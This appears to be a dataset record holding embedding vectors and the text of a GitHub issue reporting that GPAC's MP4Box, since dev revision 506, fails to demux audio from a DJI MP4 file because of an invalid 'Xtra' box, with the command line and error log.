-0.002122723264619708, -0.015147333964705467, 0.004331553354859352, 0.011643155477941036, 0.025757206603884697, -0.009913529269397259, 0.015117383562028408, 0.006536639761179686, 0.006034973077476025, 0.008528330363333225, -0.00028312334325164557, -0.007704698946326971, -0.014271289110183716, -0.013964299112558365, -0.006604027934372425, -0.008685569278895855, -0.0013121948577463627, -0.014533353969454765, 0.012564125470817089, 0.009816191159188747, 0.05016665160655975, -0.011747981421649456, -0.014593253843486309, 0.00078666175249964, -0.0005222572945058346, 0.004361503757536411, -0.012137334793806076, 0.021040042862296104, -0.00965146441012621, 0.0077121867798268795, 0.0074576097540557384, -0.005110259633511305, -0.012916040606796741, 0.006607771385461092, -0.0012195362942293286, 0.010707210749387741, 0.0014722414780408144, 0.005574488081037998, 0.011433503590524197, 0.024274669587612152, 0.012549150735139847, -0.0030362054239958525, 0.010729673318564892, -0.003313245251774788, -0.003084874711930752, 0.0008526458987034857, -0.009239648468792439, -0.012526687234640121, -0.007599873002618551, -0.02017148584127426, -0.005930147599428892, 0.0020890291780233383, 0.021354520693421364, -0.00012237481132615358, -0.039384566247463226, -0.0013337215641513467, -0.008940146304666996, 0.003612747648730874, -0.00011231339885853231, 0.0020310005638748407, -0.013732184655964375, 0.027075016871094704, 0.010954299941658974, 0.02658083662390709, -0.014278776943683624, 0.023016758263111115, 0.010669772513210773, 0.005480893887579441, -0.004953020717948675, -0.010797061026096344, -0.025727255269885063, 0.008460942655801773, 0.005611926317214966, -0.024843722581863403, -0.012107384391129017, 0.010976762510836124, -0.025652380660176277, -0.0005826257402077317, -0.021189793944358826, 0.00624088104814291, 0.004649774637073278, 0.002263115020468831, 0.02496352419257164, 0.014218876138329506, -0.0002653404080774635, -0.01575382612645626, 0.020680639892816544, -0.006873579695820808, -0.022762181237339973, -0.005409761797636747, -0.01897347718477249, -0.027703970670700073, -0.0068698362447321415, -0.014585766941308975, -0.016757158562541008, 0.013035841286182404, 0.024589145556092262, -0.014173950999975204, 0.01242934912443161, -0.010183081030845642, 0.0003788237227126956, 0.001806373824365437, -0.005888965912163258, -0.012174772098660469, -0.008468430489301682, -0.0101681062951684, -0.004971739836037159, 0.006682646926492453, 0.006742547731846571, 0.0014610100770369172, -0.025502629578113556, 0.0077720871195197105, 0.004735881462693214, 0.028737254440784454, -0.008273753337562084, -0.0003512133553158492, 0.016053328290581703, -0.003096105996519327, -0.0070645129308104515, -0.02126467041671276, 0.003994612954556942, 0.008820345625281334, 0.0011577639961615205, 0.004604849498718977, 0.004391453694552183, -0.007794549688696861, 0.025562528520822525, 0.020051686093211174, -0.010362782515585423, 0.0012916040141135454, 0.009089897386729717, 0.0008671529940329492, -0.013035841286182404, -0.008940146304666996, -0.019842034205794334, -0.011044151149690151, -0.012489249929785728, -0.0022238052915781736, 0.010946812108159065, 0.0010866321390494704, 0.02361576445400715, -0.02792859822511673, -0.004208008758723736, 0.006693878676742315, -0.015334522351622581, -0.007513766176998615, 0.0014535225927829742, 0.013679771684110165, -0.009187235496938229, -0.017910243943333626, -0.019737208262085915, 0.01276628952473402, 0.020141536369919777, -0.014787930995225906, -0.02075551636517048, 0.038665760308504105, -0.009381912648677826, 0.011313702911138535, -0.0017839111387729645, 0.006690134759992361, 0.013919373974204063, 0.03126804903149605, -0.015663975849747658, 0.0012157924938946962, -0.013702234253287315, 0.006899786181747913, 0.01019056886434555, 0.0054060183465480804, -0.009344474412500858, -0.007817012257874012, -0.029006807133555412, 0.01877880096435547, -0.008902708999812603, -0.0009158221655525267, 0.005462174769490957, -0.013814548030495644, -0.011291240341961384, -0.005057846661657095, 0.009501713328063488, 0.005982560105621815, 0.01747596450150013, 0.02652093768119812, -0.016577458009123802, 0.0037568830884993076, 0.011718031018972397, 0.013582433573901653, 0.013320368714630604, 0.003354426706209779, 0.00039169297087937593, 0.0016865727957338095, 0.0060274857096374035, 0.0060536921955645084, 0.013627358712255955, -0.012399398721754551, 0.010018355213105679, -0.004009588155895472, -0.003760627005249262, -0.002270602621138096, 0.011298728175461292, 0.00542099354788661, -0.002725471742451191, 0.01762571558356285, 0.008490893058478832, 0.008438480086624622, -0.026955215260386467, -0.0014245082857087255, -0.0015003198059275746, 0.01255663763731718, 0.015222209505736828, -0.02138447016477585, -0.02412491850554943, -0.004653518553823233, 0.017865316942334175, 0.022717256098985672, 0.022268002852797508, -0.006207187194377184, -0.008752956986427307, -0.022867007181048393, -0.010901886969804764, -0.024349544197320938, -0.009277086704969406, 0.0009148862445726991, 0.004885633010417223, 0.004312834236770868, 0.01078957412391901, 0.002377300290390849, 0.011111538857221603, -0.002463407116010785, 0.00790686346590519, 0.030549244955182076, 0.005372324027121067, -0.011081588454544544, -0.004436379298567772, 0.007742136716842651, 0.002628133399412036, 0.0038111680187284946, -0.01315564289689064, 0.034772228449583054, 0.017431039363145828, -0.0373479500412941, 0.010145643725991249, -0.013417706824839115, 0.015663975849747658, 0.0009373488719575107, 0.013881935738027096, -0.015738850459456444, -0.008520843461155891, 0.002761037787422538, 0.009127335622906685, -0.020156510174274445, 0.0008423504768870771, 0.005709264427423477, -0.004541205242276192, -0.004601105581969023, 0.0340234711766243, -0.005203854292631149, 0.006128567736595869, -0.002446560189127922, -0.010287906974554062, 0.0042566778138279915, -0.004664749838411808, 0.002163904719054699, 0.01557412464171648, -0.0006490778177976608, -0.00045346535625867546, 0.00021316147467587143, 0.009479250758886337, -0.020456014201045036, 0.019542532041668892, 0.003805552376434207, 0.027659045532345772, -0.009262111969292164, 0.018449347466230392, -0.0004614208883140236, -0.0024615353904664516, -0.013245493173599243, -0.011074100621044636, -0.005971328821033239, -0.005555769428610802, 0.003120440524071455, 0.008505867794156075, 0.0006921312888152897, -0.029306309297680855, -0.007371502462774515, 0.03150765225291252, 0.007764599751681089, -0.013215542770922184, 0.0036689043045043945, -0.0120924087241292, -0.012212210334837437, 0.006723828613758087, 0.009329499676823616, 0.027479344978928566, 0.015049994923174381, 0.006551614962518215, -0.011440991424024105, -0.0023099121171981096, -0.0008821281371638179, -0.014728030189871788, 0.017745517194271088, -0.022896958515048027, -0.0012363833375275135, -0.00193740613758564, 0.003534128190949559, -0.003934712614864111, 0.0129010658711195, 0.004028307273983955, -0.008198877796530724, 0.011306215077638626, 0.002163904719054699, -0.003296398324891925, 0.003889787243679166, 0.011530841700732708, 0.009464276023209095, 0.008947634138166904, 0.0024315849877893925, 0.03213660791516304, -0.012646488845348358, 0.0007656029774807394, 0.018763825297355652, 0.01741606369614601, 0.0011605718173086643, -0.01281870249658823, 0.00518887909129262, 0.01518477126955986, -0.017565814778208733, 0.008842808194458485, -0.009980916976928711, -0.021758848801255226, -0.024634072557091713, 0.0056381323374807835, 0.027134917676448822, 0.011553305201232433, -0.020261336117982864, -0.015783775597810745, 0.01032534521073103, -0.00009423796291230246, 0.008910195901989937, -0.011950145475566387, 0.005499612540006638, -0.01800009422004223, -0.005484637804329395, 0.011725518852472305, 0.02776387147605419, 0.0036221069749444723, -0.013604896143078804, -0.0004965187981724739, -0.01877880096435547, -0.013881935738027096, -0.00004401866317493841, -0.009179748594760895, 0.01531954761594534, 0.005409761797636747, -0.008558280766010284, 0.008715519681572914, 0.004945533350110054, 0.004956764634698629, 0.021609097719192505, -0.014480940997600555, -0.012886090204119682, -0.005563256796449423, -0.018584122881293297, 0.00666767219081521, 0.009561614133417606, 0.006682646926492453, -0.006622746586799622, 0.0009102064650505781, 0.008588231168687344, 0.012234672904014587, 0.014054149389266968, -0.022702282294631004, 0.005664338823407888, 0.011905220337212086, 0.016262980177998543, 0.005570744629949331, -0.000854517740663141, 0.030698996037244797, 0.004953020717948675, -0.0029033012688159943, -0.015349498018622398, -0.005690545309334993, 0.005462174769490957, 0.021040042862296104, -0.0020104097202420235, 0.0046834684908390045, -0.0006799640250392258, -0.011193902231752872, -0.014907731674611568, 0.003983381669968367, 0.008970096707344055, -0.0006766882142983377, 0.006809935439378023, 0.001361799892038107, -0.004455097950994968, -0.020875316113233566, -0.016727209091186523, -0.010849473997950554, -0.0019692282658070326, -0.009950966574251652, 0.018479296937584877, 0.008543306030333042, 0.03833630681037903, 0.005024152807891369, 0.014832856133580208, -0.010602384805679321, 0.03147770091891289, 0.023735564202070236, 0.00026510641328059137, 0.019527556374669075, -0.006162261590361595, 0.00499420240521431, 0.008124002255499363, 0.004735881462693214, -0.001516230870038271, 0.008348628878593445, 0.01722138747572899, -0.0006841757567599416, -0.0004174314672127366, 0.011193902231752872, -0.01659243181347847, 0.01564900018274784, 0.009209698997437954, -0.0037475237622857094, 0.014188925735652447, 0.012721364386379719, 0.009232161566615105, -0.002474638633430004, 0.005727983079850674, 0.033873721957206726, 0.004795782268047333, -0.017910243943333626, -0.011201389133930206, 0.022657355293631554, -0.005769164767116308, -0.03722814843058586, 0.007914350368082523, 0.019722232595086098, 0.004522486124187708, -0.007921838201582432, 0.014862806536257267, -0.013417706824839115, 0.0011034791823476553, -0.019108252599835396, 0.0018700180808082223, 0.01230206061154604, 0.02511327527463436, -0.006768754217773676, 0.00773464934900403, 0.007277908269315958, -0.018958501517772675, -0.011208876967430115, 0.02084536664187908, -0.00663023442029953, 0.009277086704969406, -0.01612820476293564, -0.005304936319589615, -0.02854257822036743, 0.02178879827260971, 0.005087797064334154, 0.018838699907064438, -0.021609097719192505, 0.0006453340756706893, -0.007423915434628725, -0.008535818196833134, -0.015199746005237103, 0.004795782268047333, -0.005170159973204136, 0.010797061026096344, -0.039654117077589035, 0.01557412464171648, 0.019617406651377678, 0.011590742506086826, 0.00746509712189436, 0.006596540100872517, -0.0017314981669187546, -0.00967392697930336, -0.02018646150827408, -0.003418070962652564, 0.005151441320776939, -0.013604896143078804, -0.011119026690721512, -0.004436379298567772, -0.024783823639154434, 0.009509201161563396, -0.002680546371266246, 0.0151098957285285, 0.014121538028120995, -0.005522075574845076, 0.0020852854941040277, 0.0034835871774703264, -0.002373556373640895, 0.017251336947083473, 0.010849473997950554, -0.0014170206850394607, 0.01196512021124363, -0.01206994615495205, -0.0018091816455125809, 0.00007581154204672202, -0.02174387313425541, -0.012384423986077309, 0.0008573256200179458, -0.004024563357234001, -0.009127335622906685, 0.008573256433010101, 0.0024503038730472326, -0.0022462678607553244, 0.02121974527835846, 0.030384518206119537, 0.0077121867798268795, 0.00384111818857491, 0.00387481227517128, -0.0029463546816259623, 0.014016712084412575, -0.004582386463880539, -0.010048305615782738, 0.016038352623581886, -0.020291287451982498, 0.017865316942334175, -0.00624088104814291, 0.004410172812640667, -0.018703924492001534, -0.019198102876544, 0.015297085046768188, 0.00672008516266942, -0.019632382318377495, 0.009112359955906868, 0.007996713742613792, -0.015072457492351532, 0.009336987510323524, 0.009891066700220108, 0.018134869635105133, -0.014832856133580208, -0.0026674431283026934, -0.005274985916912556, 0.00970387738198042, 0.001213920651935041, 0.02647601068019867, 0.003470483934506774, -0.00012424669694155455, -0.005787883885204792, 0.00792932603508234, 0.0291266068816185, -0.014465965330600739, -0.02044103853404522, -0.0034779715351760387, -0.010729673318564892, -0.008198877796530724, -0.0034573806915432215, -0.013530020602047443, -0.011238827370107174, 0.012916040606796741, -0.007869425229728222, -0.00970387738198042, -0.012601562775671482, -0.005009177606552839, 0.006907274015247822, 0.0241398923099041, -0.016757158562541008, 0.007521254010498524, 0.003429302480071783, 0.005608182400465012, -0.015634024515748024, 0.05127480998635292, 0.004279140383005142, 0.014114050194621086, 0.018524223938584328, -0.00008979222184279934, 0.005926403682678938, -0.004443866666406393, -0.009381912648677826, -0.008685569278895855, 0.000032553336495766416, -0.0076897237449884415, 0.011605718173086643, -0.007974251173436642, -0.004383966326713562, -0.01991690881550312, -0.007386477664113045, 0.004571155179291964, -0.004960508551448584, -0.01299840398132801, -0.015993427485227585, 0.009434325620532036, -0.0012513584224507213, 0.00780203752219677, -0.028946906328201294, -0.011351141147315502, 0.00801168940961361, 0.009052460081875324, -0.04034297168254852, -0.005585719831287861, 0.004080720245838165, 0.02647601068019867, -0.03042944334447384, -0.013627358712255955, 0.008970096707344055, 0.02184869907796383, 0.006997124757617712, -0.0026524681597948074, 0.018434371799230576, -0.016307905316352844, -0.006881067529320717, -0.03135789930820465, 0.010392732918262482, 0.006645209155976772, 0.004346528556197882, -0.0241398923099041, 0.021624073386192322, -0.017880292609333992, 0.02885705605149269, 0.022852033376693726, 0.017341189086437225, -0.003410583594813943, 0.01934785395860672, -0.016053328290581703, 0.00304182106629014, 0.020530888810753822, 0.0003062879841309041, 0.008228828199207783, -0.009187235496938229, -0.022193128243088722, -0.022297952324151993, 0.006547871045768261, -0.004219240043312311, -0.023945216089487076, -0.01705666072666645, -0.01918312907218933, 0.00380368041805923, 0.014353652484714985, -0.0021245949901640415, -0.005533306859433651, 0.02267233096063137, -0.013941836543381214, -0.005042871460318565, -0.009486738592386246, -0.005559513345360756, -0.004923070780932903, -0.02059078961610794, 0.00819139089435339, -0.018763825297355652, 0.012803727760910988, -0.006356938276439905, -0.010774598456919193, -0.02330128662288189, 0.0018307083519175649, -0.0006153838476166129, 0.0018484913744032383, -0.0010201800614595413, -0.011515866965055466, -0.00323649775236845, 0.004387710243463516, 0.006439301650971174, 0.029635760933160782, -0.005555769428610802, -0.01493019424378872, -0.02460412122309208, 0.017820391803979874, -0.009846141561865807, 0.009404375217854977, 0.01991690881550312, 0.004548692610114813, 0.009396887384355068, 0.011313702911138535, -0.001175546902231872, -0.03333461657166481, -0.0012419989798218012, -0.00008365008397959173, -0.0035640785936266184, 0.0005929211620241404, -0.005518331658095121, -0.012242160737514496, 0.006559102330356836, 0.009531663730740547, -0.01747596450150013, -0.021204769611358643, 0.000060485443100333214, 0.003006255254149437, -0.0008470301982015371, 0.002779756672680378, 0.001446970971301198, 0.012369449250400066, 0.004578643012791872, -0.007401452865451574, -0.0046834684908390045, 0.02105501852929592, -0.007996713742613792, -0.018808750435709953, 0.003594028763473034, 0.0019317903788760304, 0.023795465007424355, 0.03062411956489086, -0.018838699907064438, -0.0016163770342245698, 0.003262704238295555, 0.02002173475921154, 0.02065069042146206, 0.006364425644278526, -0.002034744480624795, -0.021609097719192505, 0.01747596450150013, 0.00018414716760162264, 0.030354566872119904, 0.007596129551529884, 0.021504271775484085, -0.005319911055266857, 0.01737113855779171, -0.01966233178973198, 0.011373603716492653, -0.007727161515504122, -0.005009177606552839, 0.005937634967267513, -0.005844040308147669, -0.013058304786682129, 0.00819139089435339, -0.013492582365870476, -0.00405451375991106, 0.005230060312896967, 0.01674218289554119, 0.0013056432362645864, 0.0247089471668005, -0.006158518139272928, 0.009194723330438137, -0.008670594543218613, 0.027494318783283234, 0.005065334029495716, -0.023391136899590492, -0.008872758597135544, 0.007206776179373264, 0.006686390843242407, 0.0035734379198402166, 0.025502629578113556, -0.0029744331259280443, -0.027389494702219963, -0.01913820207118988, 0.008116514421999454, -0.0038111680187284946, 0.0019336623372510076, -0.007214264012873173, 0.007596129551529884, 0.004455097950994968, 0.022477654740214348, 0.013799572363495827, -0.004619824234396219, 0.033514317125082016, -0.03623978793621063, 0.0077720871195197105, 0.008116514421999454, -0.009876091033220291, 0.008835320360958576, -0.024454370141029358, 0.006326987873762846, -0.004848194774240255, 0.0020815415773540735, -0.032525960355997086, 0.011905220337212086, 0.002075925935059786, -0.0064542763866484165, 0.027209792286157608, 0.006304525304585695, -0.005529562942683697, 0.019991785287857056, -0.004279140383005142, 0.017595766112208366, -0.01856914907693863, -0.002358581405133009, 0.008356116712093353 ]
258
null
null
null
null
null
null
null
null
null
[ "gpac", "gpac" ]
Hello all GPAC Coders and Contributors, Platform: Win10 x64 Release of GPAC where the bug has been observed : since at least dev1.1.0 rev506. tested also 587 and 588 (latest today) Release known to be working: dev1.1.0 rev447 ## Description of the bug A certain file that can be demuxed with previous versions of Mp4box can not be demuxed anymore, with an error (see below). ## link to the file https://www.mediafire.com/file/w4589c5dhn4nivl/DJI_0136.rar/file ## Command line used "C:\Program Files\StaxRip\Apps\Support\MP4Box\MP4Box.exe" -single 2 -out "C:\Temp\_StaxRip\DJI_0136_temp\ID1 English {DJI.AAC}.m4a" "D:\Downloads\_IDM Downloads\DJI_0136.MP4" ## Error description [isom] invalid tag size in Xtra ! [isom] not enough bytes in box Xtra: 177 left, reading 536576 (file ..\..\src\isomedia\box_code_base.c, line 12440) [iso file] Read Box "Xtra" (start 90900445) failed (Invalid IsoMedia File) - skipping [iso file] Read Box "udta" (start 90900043) failed (Invalid IsoMedia File) - skipping [iso file] Read Box "moov" (start 90899927) failed (Invalid IsoMedia File) - skipping Error opening file D:\Downloads\_IDM Downloads\DJI_0136.MP4: Invalid IsoMedia File
DEV: Error demuxing audio with mp4box, dev1.1.0 since rev506, Windows x64
https://api.github.com/repos/gpac/gpac/issues/1707/comments
3
2021-03-12T18:10:52
2021-03-13T05:09:14Z
https://github.com/gpac/gpac/issues/1707
830,343,944
1,707
false
This is a GitHub Issue repo:gpac owner:gpac Title : DEV: Error demuxing audio with mp4box, dev1.1.0 since rev506, Windows x64 Issue date: --- start body --- Hello all GPAC Coders and Contributors, Platform: Win10 x64 Release of GPAC where the bug has been observed : since at least dev1.1.0 rev506. tested also 587 and 588 (latest today) Release known to be working: dev1.1.0 rev447 ## Description of the bug A certain file that can be demuxed with previous versions of Mp4box can not be demuxed anymore, with an error (see below). ## link to the file https://www.mediafire.com/file/w4589c5dhn4nivl/DJI_0136.rar/file ## Command line used "C:\Program Files\StaxRip\Apps\Support\MP4Box\MP4Box.exe" -single 2 -out "C:\Temp\_StaxRip\DJI_0136_temp\ID1 English {DJI.AAC}.m4a" "D:\Downloads\_IDM Downloads\DJI_0136.MP4" ## Error description [isom] invalid tag size in Xtra ! [isom] not enough bytes in box Xtra: 177 left, reading 536576 (file ..\..\src\isomedia\box_code_base.c, line 12440) [iso file] Read Box "Xtra" (start 90900445) failed (Invalid IsoMedia File) - skipping [iso file] Read Box "udta" (start 90900043) failed (Invalid IsoMedia File) - skipping [iso file] Read Box "moov" (start 90899927) failed (Invalid IsoMedia File) - skipping Error opening file D:\Downloads\_IDM Downloads\DJI_0136.MP4: Invalid IsoMedia File --- end body ---
1,376
[ -0.058145154267549515, 0.02163504809141159, -0.011649048887193203, 0.01797017827630043, 0.004053684417158365, 0.030874215066432953, -0.035170428454875946, 0.041268277913331985, 0.0011770313140004873, 0.04557988792657852, -0.01098690927028656, -0.00535871647298336, 0.013543078675866127, 0.007603064179420471, -0.002348288195207715, 0.004611884243786335, -0.015721982344985008, 0.016122346743941307, -0.005616643466055393, -0.0015167632373049855, 0.028087066486477852, -0.0016053052386268973, -0.00427311472594738, 0.028256451711058617, -0.020972907543182373, 0.00671379454433918, -0.03544760122895241, 0.017000066116452217, -0.0344620905816555, 0.007672357838600874, 0.01438230276107788, 0.0015716206980869174, -0.009855111129581928, 0.02523832395672798, 0.06966331601142883, 0.01669209450483322, 0.04508713260293007, 0.08481554687023163, -0.0010365189518779516, 0.0041807228699326515, -0.02123468555510044, -0.04022117331624031, -0.034338902682065964, 0.005870720371603966, -0.023236503824591637, 0.011125496588647366, -0.017277240753173828, 0.020156782120466232, -0.04887519031763077, 0.006802336312830448, 0.00922376848757267, -0.019340654835104942, -0.04136066883802414, -0.04444039240479469, 0.005177782848477364, -0.027625108137726784, 0.0004400634206831455, 0.00591691629961133, -0.0250997357070446, 0.034061726182699203, 0.018863297998905182, 0.008931194432079792, -0.0035975005012005568, 0.03818855434656143, -0.00720270024612546, 0.01918666996061802, -0.003512808121740818, 0.02882619947195053, -0.01013228576630354, 0.03738782927393913, -0.009816614910960197, -0.04280813783407211, 0.0018747808644548059, 0.019771816208958626, 0.020726529881358147, -0.07496044039726257, 0.04946034029126167, 0.03010428510606289, -0.02556169405579567, 0.012195699848234653, -0.061070892959833145, 0.008777208626270294, -0.05460347607731819, 0.02643941529095173, -0.011256384663283825, 0.005685937125235796, -0.05349477380514145, -0.07976480573415756, -0.01655350625514984, -0.024452993646264076, 0.0010702034924179316, 0.03507803753018379, 0.016568904742598534, 0.008284452371299267, -0.002962307771667838, -0.014397701248526573, 0.01128718163818121, 0.005089241079986095, -0.05010708048939705, -0.052170492708683014, -0.026562605053186417, -0.0286876130849123, 0.0191250741481781, -0.011448867619037628, 0.026208436116576195, -0.009162173606455326, -0.0036629445385187864, -0.011548958718776703, 0.006971721071749926, 0.12823963165283203, 0.0255001001060009, 0.01904808171093464, 0.008600124157965183, -0.025592491030693054, 0.014436197467148304, 0.02359067276120186, -0.032983824610710144, -0.046965762972831726, -0.027963878586888313, 0.025053540244698524, -0.00299118016846478, -0.005712884943932295, -0.04521032050251961, 0.015906766057014465, -0.015952961519360542, 0.05229368433356285, -0.005682087503373623, 0.010694335214793682, -0.0020749629475176334, 0.004742772318422794, -0.06023936718702316, 0.023344295099377632, 0.0029526837170124054, -0.02115769125521183, 0.0023540626280009747, -0.018093368038535118, -0.05010708048939705, 0.023298097774386406, -0.003972841892391443, 0.02189682424068451, -0.017415829002857208, -0.033876944333314896, 0.03858891874551773, 0.009385453537106514, -0.035293616354465485, -0.0012453626841306686, -0.0015427483012899756, 0.007037165109068155, -0.0076531097292900085, 0.004223069176077843, -0.014413099735975266, -0.03443129360675812, 0.024329805746674538, -0.0036032749339938164, 0.04745851829648018, 0.012657658196985722, 0.007783997803926468, -0.015175331383943558, -0.021958420053124428, -0.002623538253828883, -0.005512702744454145, -0.024237412959337234, 0.023636868223547935, -0.0015196504537016153, -0.0019180894596502185, -0.04176103323698044, 0.023883245885372162, -0.010155384428799152, -0.001380100497044623, 0.026069847866892815, -0.01735423505306244, -0.006582906469702721, -0.002496499801054597, 0.004238467663526535, -0.04339328780770302, -0.023344295099377632, 0.019540837034583092, 0.05497303977608681, -0.02896478772163391, -0.001660162815824151, -0.02448379248380661, 0.015013645403087139, 0.008099669590592384, -0.009947502985596657, 0.02474556863307953, -0.035971157252788544, 0.035509198904037476, -0.02922656387090683, 0.02292853221297264, -0.019417649134993553, 0.008908096700906754, 0.015167632140219212, -0.003635996952652931, 0.0029834809247404337, 0.03917406499385834, 0.006367325782775879, -0.03683347627520561, -0.007295092102140188, -0.026885975152254105, -0.00023699425219092518, 0.014374603517353535, -0.014651778154075146, -0.001276159891858697, -0.004661929327994585, -0.043855246156454086, -0.007125707343220711, -0.02854902483522892, 0.04604184627532959, 0.008022676222026348, -0.04034436121582985, -0.004550289362668991, -0.040036387741565704, 0.020834321156144142, 0.007179602514952421, 0.014166722074151039, 0.010948412120342255, -0.02611604519188404, -0.005574297159910202, -0.021342474967241287, -0.020695732906460762, 0.03852732479572296, -0.022820740938186646, 0.01613774523139, -0.005031496286392212, -0.03735703229904175, -0.01958703249692917, -0.010809824801981449, -0.011502762325108051, -0.013589274138212204, 0.012942533008754253, 0.02258976176381111, 0.009308460168540478, -0.009554837830364704, 0.015159932896494865, 0.00713725620880723, -0.0049776011146605015, -0.016384122893214226, -0.000438138609752059, -0.005789877846837044, 0.003999789245426655, -0.029472941532731056, 0.038558121770620346, -0.0012290016748011112, -0.0303814597427845, -0.00029618266853503883, 0.059654220938682556, 0.005470356438308954, -0.008091970346868038, -0.027024561539292336, 0.0050584436394274235, 0.028672214597463608, -0.016707492992281914, -0.004269265104085207, 0.02733253501355648, -0.02325190231204033, 0.019001886248588562, 0.029780913144350052, -0.00970112532377243, -0.007668508216738701, -0.06063973158597946, -0.004199970979243517, 0.022481972351670265, -0.010317069478332996, -0.011695245280861855, 0.006321129854768515, -0.030289068818092346, -0.007587665691971779, -0.006917825900018215, -0.02556169405579567, -0.0344620905816555, 0.006017007399350405, 0.01431300863623619, -0.053741153329610825, 0.013766358606517315, -0.012180301360785961, -0.01830894872546196, 0.02408342808485031, 0.007787847425788641, 0.00751067278906703, 0.011333378031849861, -0.0054357098415493965, 0.04022117331624031, 0.014536288566887379, 0.019556235522031784, -0.010779027827084064, 0.011256384663283825, 0.03159794956445694, -0.0031393917743116617, -0.03473926708102226, 0.019217466935515404, 0.010840621776878834, 0.012434378266334534, -0.05691326782107353, 0.010909915901720524, -0.007876389659941196, 0.001246325089596212, 0.010317069478332996, 0.008638620376586914, 0.019232865422964096, -0.00009082774340640754, -0.026347024366259575, 0.026901373639702797, -0.0073220394551754, -0.013081120327115059, -0.02842583693563938, 0.01458248496055603, -0.017061661928892136, 0.013135015033185482, -0.020834321156144142, -0.018216557800769806, 0.03911247104406357, -0.017646808177232742, -0.03273744881153107, 0.0017612160881981254, -0.0026139141991734505, -0.00030917522963136435, 0.0012665357207879424, -0.025808071717619896, -0.013504581525921822, -0.004469446837902069, -0.003193286946043372, 0.004858261905610561, -0.051092591136693954, 0.01587596721947193, 0.018971089273691177, -0.024175819009542465, -0.027317136526107788, 0.008145865052938461, -0.03843493387103081, 0.004542590118944645, -0.011880028061568737, -0.0054049124009907246, 0.018231956288218498, -0.01536011416465044, 0.030011892318725586, -0.005281723570078611, -0.037942178547382355, -0.013481483794748783, 0.025577092543244362, -0.014259113930165768, -0.012326587922871113, 0.024976547807455063, -0.006359626539051533, -0.012411280535161495, -0.01986420899629593, -0.022974727675318718, -0.010925314389169216, -0.007406732067465782, 0.02529991790652275, 0.01579897478222847, 0.0009754057973623276, 0.0042962124571204185, -0.003285678569227457, 0.024098826572299004, 0.004119128454476595, -0.029857907444238663, -0.01776999793946743, -0.02617763914167881, -0.002205851022154093, 0.010832922533154488, 0.009254565462470055, -0.02591586299240589, 0.019032683223485947, 0.0084153413772583, -0.011548958718776703, -0.005959262605756521, -0.014744170010089874, -0.004996849223971367, -0.012334287166595459, -0.01532161794602871, -0.008769509382545948, 0.020433956757187843, -0.06726112961769104, 0.0382501482963562, -0.03443129360675812, -0.0011327603133395314, 0.02088051661849022, -0.012280392460525036, -0.025269120931625366, 0.015845170244574547, -0.04665779322385788, 0.01830894872546196, 0.03553999587893486, -0.04280813783407211, 0.020526347681879997, -0.0043770549818873405, -0.024021834135055542, 0.022497370839118958, -0.040251970291137695, -0.013304400257766247, -0.02556169405579567, 0.01482116337865591, -0.041052695363759995, -0.055989351123571396, -0.023082518950104713, 0.017077060416340828, -0.030427655205130577, -0.025792673230171204, -0.0023540626280009747, -0.0195254385471344, 0.038619715720415115, 0.0025215225759893656, 0.016707492992281914, 0.006170993205159903, -0.03621753305196762, 0.046072643250226974, -0.020249173045158386, -0.0024310557637363672, 0.027686702087521553, 0.019232865422964096, 0.004989149980247021, 0.01427451241761446, -0.008600124157965183, 0.0014234090922400355, 0.0005370265571400523, 0.0023579122498631477, 0.010771328583359718, 0.010232376866042614, -0.02359067276120186, 0.03948203846812248, 0.00037149147829040885, -0.004916006699204445, -0.01200321689248085, -0.03316860646009445, 0.026639597490429878, 0.015298520214855671, -0.03714144974946976, 0.016322527080774307, 0.02693217061460018, -0.025469303131103516, 0.015421709045767784, -0.03972841799259186, 0.028872394934296608, -0.018616920337080956, 0.0018208858091384172, -0.010825223289430141, -0.04557988792657852, -0.04225378856062889, 0.00311051937751472, 0.029010983183979988, -0.038280948996543884, 0.041668642312288284, 0.008808005601167679, 0.018462935462594032, 0.019448446109890938, -0.02386784739792347, -0.04659619554877281, -0.017107857391238213, 0.022204797714948654, -0.021404068917036057, 0.015983758494257927, 0.02733253501355648, -0.0025946658570319414, -0.029010983183979988, -0.019910404458642006, -0.0019921953789889812, -0.0019142398377880454, 0.013612371869385242, 0.049737513065338135, -0.00803807470947504, 0.023760056123137474, 0.026223834604024887, 0.03199831396341324, -0.009269963949918747, 0.03341498598456383, 0.02408342808485031, -0.029041780158877373, -0.005420310888439417, 0.014998246915638447, -0.01102540548890829, -0.017123255878686905, -0.007687756791710854, 0.00046051471144892275, 0.02360607124865055, -0.0034261909313499928, 0.014420798979699612, -0.014428498223423958, 0.0019450370455160737, 0.002538846107199788, -0.01579897478222847, 0.0033665213268250227, -0.015106037259101868, 0.0025176729541271925, 0.003202911000698805, -0.011094699613749981, -0.03138237074017525, -0.012264993973076344, -0.017046261578798294, -0.022189399227499962, 0.0016120420768857002, 0.008638620376586914, 0.03011968359351158, 0.024452993646264076, -0.009108278900384903, 0.0084153413772583, 0.0008907134179025888, -0.010317069478332996, -0.0015937562566250563, 0.02366766519844532, 0.005023797042667866, 0.004908307455480099, -0.017123255878686905, 0.014174421317875385, 0.025530897080898285, 0.03655630350112915, -0.03477006405591965, -0.01372786145657301, 0.05546579882502556, 0.0038496528286486864, -0.01502134557813406, -0.009716523811221123, -0.03581716865301132, -0.0007015992305241525, -0.018878696486353874, -0.010494153015315533, -0.03880450129508972, 0.009431648999452591, 0.021727440878748894, 0.026162240654230118, 0.02414502203464508, -0.01111779734492302, -0.020495550706982613, -0.024576183408498764, 0.04055994004011154, -0.009123677387833595, 0.009200669825077057, -0.008623221889138222, 0.0017063586274161935, 0.026685792952775955, 0.006840832997113466, -0.04647300764918327, -0.02155805565416813, 0.011941622942686081, 0.016168542206287384, -0.03236788138747215, 0.028656816110014915, -0.002292468212544918, 0.026393219828605652, 0.0008036150247789919, -0.017800794914364815, -0.025068938732147217, 0.032521866261959076, -0.0434240847826004, 0.022497370839118958, -0.019510040059685707, 0.01122558768838644, 0.009092879481613636, 0.017446625977754593, 0.006975570693612099, 0.00640967208892107, 0.009624131955206394, -0.01966402679681778, 0.013550777919590473, 0.03683347627520561, 0.005127737298607826, 0.0033703709486871958, 0.019925802946090698, 0.010147684253752232, 0.009408551268279552, 0.03172113746404648, -0.0019585108384490013, 0.035293616354465485, 0.013720162212848663, -0.005685937125235796, 0.0018333970801904798, 0.005043045151978731, 0.016861479729413986, 0.008946592919528484, -0.03960522636771202, -0.006467416882514954, 0.010825223289430141, -0.01946384459733963, 0.02442219667136669, 0.02041855826973915, 0.004492544569075108, 0.007907186634838581, 0.020788125693798065, -0.014859659597277641, -0.0066560497507452965, -0.009008187800645828, 0.024037232622504234, 